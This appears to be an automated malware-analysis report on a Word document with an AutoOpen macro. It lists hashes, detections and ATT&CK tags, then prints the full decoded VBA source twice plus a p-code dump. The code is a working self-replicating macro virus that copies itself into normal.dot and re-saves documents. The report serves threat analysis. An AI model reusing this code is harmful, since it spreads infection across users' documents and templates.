Office (OLE) malware analysis — malicious · 1f7fbe4da47fac50

MALICIOUS

Office (OLE)

27.0 KB Created: 1999-05-09 18:59:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: d3276a44098ae8d9bee9a01326590ca3 SHA-1: 228ee258487f9a9a369d7a3fb19711f131d290e6 SHA-256: 1f7fbe4da47fac50d2e48f7851b994ee0aa5fdeee615f9e56136f27633a70c9d

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing a VBA macro with an AutoOpen subroutine. This macro attempts to copy itself into the user's normal.dot template, which is a common technique for macro-based malware to achieve persistence and spread to other documents. The macro's comments explicitly refer to itself as a 'Macro-virus'.

Heuristics 4

ClamAV: Doc.Trojan.Minimal-63 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Minimal-63
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2931 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2931 bytes
SHA-256: `fc1ec4b366875706f5ee79f55a6ca77834396f4b9ed51ff8e645b0b7bcbfd64e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "AutoOpen" 'The SMALLEST Macro-virus in history ;) '(c) Master of infection 'Queen Hitman Virus inc. Public Sub MAIN() Dim nn$ Dim n0$ Dim n1$ Dim n2$ n0$ = ":AutoOpen" nn$ = WordBasic.[DefaultDir$](2) + "/normal.dot" n1$ = WordBasic.[FileName$]() + n0$ n2$ = nn$ + n0$ On Error GoTo -1: On Error GoTo cont WordBasic.MacroCopy n1$, n2$ GoTo okey cont: WordBasic.MacroCopy n2$, n1$ On Error GoTo zt Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False) WordBasic.CurValues.FileSaveAs dlg dlg.Format = 1 WordBasic.FileSaveAs dlg GoTo okey zt: WordBasic.MsgBox "ERROR!", 16 okey: WordBasic.MsgBox "OK!", 64 End Sub ' Processing file: /opt/analyzer/scan_staging/d457ffdfa7ef4172902fb9f6bbc59881.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 903 bytes ' Macros/VBA/AutoOpen - 2175 bytes ' Line #0: ' QuoteRem 0x0000 0x0027 "The SMALLEST Macro-virus in history ;)" ' Line #1: ' QuoteRem 0x0000 0x0017 "(c) Master of infection" ' Line #2: ' QuoteRem 0x0000 0x0017 "Queen Hitman Virus inc." ' Line #3: ' FuncDefn (Public Sub MAIN()) ' Line #4: ' Dim ' VarDefn nn ' Line #5: ' Dim ' VarDefn n0 ' Line #6: ' Dim ' VarDefn n1 ' Line #7: ' Dim ' VarDefn n2 ' Line #8: ' LitStr 0x0009 ":AutoOpen" ' St n0$ ' Line #9: ' LitDI2 0x0002 ' Ld WordBasic ' ArgsMemLd [DefaultDir$] 0x0001 ' LitStr 0x000B "/normal.dot" ' Add ' St nn$ ' Line #10: ' Ld WordBasic ' ArgsMemLd [FileName$] 0x0000 ' Ld n0$ ' Add ' St n1$ ' Line #11: ' Ld nn$ ' Ld n0$ ' Add ' St n2$ ' Line #12: ' OnError <crash> ' BoS 0x0000 ' OnError cont ' Line #13: ' Ld n1$ ' Ld n2$ ' Ld WordBasic ' ArgsMemCall MacroCopy 0x0002 ' Line #14: ' GoTo okey ' Line #15: ' Label cont ' Line #16: ' Ld n2$ ' Ld n1$ ' Ld WordBasic ' ArgsMemCall MacroCopy 0x0002 ' Line #17: ' OnError zt ' Line #18: ' Dim ' VarDefn dlg (As Object) ' BoS 0x0000 ' SetStmt ' LitVarSpecial (False) ' Ld WordBasic ' MemLd DialogRecord ' ArgsMemLd FileSaveAs 0x0001 ' Set dlg ' Line #19: ' Ld dlg ' Ld WordBasic ' MemLd CurValues ' ArgsMemCall FileSaveAs 0x0001 ' Line #20: ' LitDI2 0x0001 ' Ld dlg ' MemSt Format$ ' Line #21: ' Ld dlg ' Ld WordBasic ' ArgsMemCall FileSaveAs 0x0001 ' Line #22: ' GoTo okey ' Line #23: ' Label zt ' Line #24: ' LitStr 0x0006 "ERROR!" ' LitDI2 0x0010 ' Ld WordBasic ' ArgsMemCall MsgBox 0x0002 ' Line #25: ' Label okey ' Line #26: ' LitStr 0x0003 "OK!" ' LitDI2 0x0040 ' Ld WordBasic ' ArgsMemCall MsgBox 0x0002 ' Line #27: ' EndSub ' Line #28:

SHA-256: fc1ec4b366875706f5ee79f55a6ca77834396f4b9ed51ff8e645b0b7bcbfd64e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"
'The SMALLEST Macro-virus in history  ;)
'(c) Master of infection
'Queen Hitman Virus inc.
Public Sub MAIN()
Dim nn$
Dim n0$
Dim n1$
Dim n2$
n0$ = ":AutoOpen"
nn$ = WordBasic.[DefaultDir$](2) + "/normal.dot"
n1$ = WordBasic.[FileName$]() + n0$
n2$ = nn$ + n0$
On Error GoTo -1: On Error GoTo cont
WordBasic.MacroCopy n1$, n2$
GoTo okey
cont:
WordBasic.MacroCopy n2$, n1$
On Error GoTo zt
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
dlg.Format = 1
WordBasic.FileSaveAs dlg
GoTo okey
zt:
WordBasic.MsgBox "ERROR!", 16
okey:
WordBasic.MsgBox "OK!", 64
End Sub


' Processing file: /opt/analyzer/scan_staging/d457ffdfa7ef4172902fb9f6bbc59881.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/AutoOpen - 2175 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0027 "The SMALLEST Macro-virus in history  ;)"
' Line #1:
' 	QuoteRem 0x0000 0x0017 "(c) Master of infection"
' Line #2:
' 	QuoteRem 0x0000 0x0017 "Queen Hitman Virus inc."
' Line #3:
' 	FuncDefn (Public Sub MAIN())
' Line #4:
' 	Dim 
' 	VarDefn nn
' Line #5:
' 	Dim 
' 	VarDefn n0
' Line #6:
' 	Dim 
' 	VarDefn n1
' Line #7:
' 	Dim 
' 	VarDefn n2
' Line #8:
' 	LitStr 0x0009 ":AutoOpen"
' 	St n0$ 
' Line #9:
' 	LitDI2 0x0002 
' 	Ld WordBasic 
' 	ArgsMemLd [DefaultDir$] 0x0001 
' 	LitStr 0x000B "/normal.dot"
' 	Add 
' 	St nn$ 
' Line #10:
' 	Ld WordBasic 
' 	ArgsMemLd [FileName$] 0x0000 
' 	Ld n0$ 
' 	Add 
' 	St n1$ 
' Line #11:
' 	Ld nn$ 
' 	Ld n0$ 
' 	Add 
' 	St n2$ 
' Line #12:
' 	OnError <crash> 
' 	BoS 0x0000 
' 	OnError cont 
' Line #13:
' 	Ld n1$ 
' 	Ld n2$ 
' 	Ld WordBasic 
' 	ArgsMemCall MacroCopy 0x0002 
' Line #14:
' 	GoTo okey 
' Line #15:
' 	Label cont 
' Line #16:
' 	Ld n2$ 
' 	Ld n1$ 
' 	Ld WordBasic 
' 	ArgsMemCall MacroCopy 0x0002 
' Line #17:
' 	OnError zt 
' Line #18:
' 	Dim 
' 	VarDefn dlg (As Object)
' 	BoS 0x0000 
' 	SetStmt 
' 	LitVarSpecial (False)
' 	Ld WordBasic 
' 	MemLd DialogRecord 
' 	ArgsMemLd FileSaveAs 0x0001 
' 	Set dlg 
' Line #19:
' 	Ld dlg 
' 	Ld WordBasic 
' 	MemLd CurValues 
' 	ArgsMemCall FileSaveAs 0x0001 
' Line #20:
' 	LitDI2 0x0001 
' 	Ld dlg 
' 	MemSt Format$ 
' Line #21:
' 	Ld dlg 
' 	Ld WordBasic 
' 	ArgsMemCall FileSaveAs 0x0001 
' Line #22:
' 	GoTo okey 
' Line #23:
' 	Label zt 
' Line #24:
' 	LitStr 0x0006 "ERROR!"
' 	LitDI2 0x0010 
' 	Ld WordBasic 
' 	ArgsMemCall MsgBox 0x0002 
' Line #25:
' 	Label okey 
' Line #26:
' 	LitStr 0x0003 "OK!"
' 	LitDI2 0x0040 
' 	Ld WordBasic 
' 	ArgsMemCall MsgBox 0x0002 
' Line #27:
' 	EndSub 
' Line #28:

Open this report in the interactive analyzer, or submit your own file for analysis.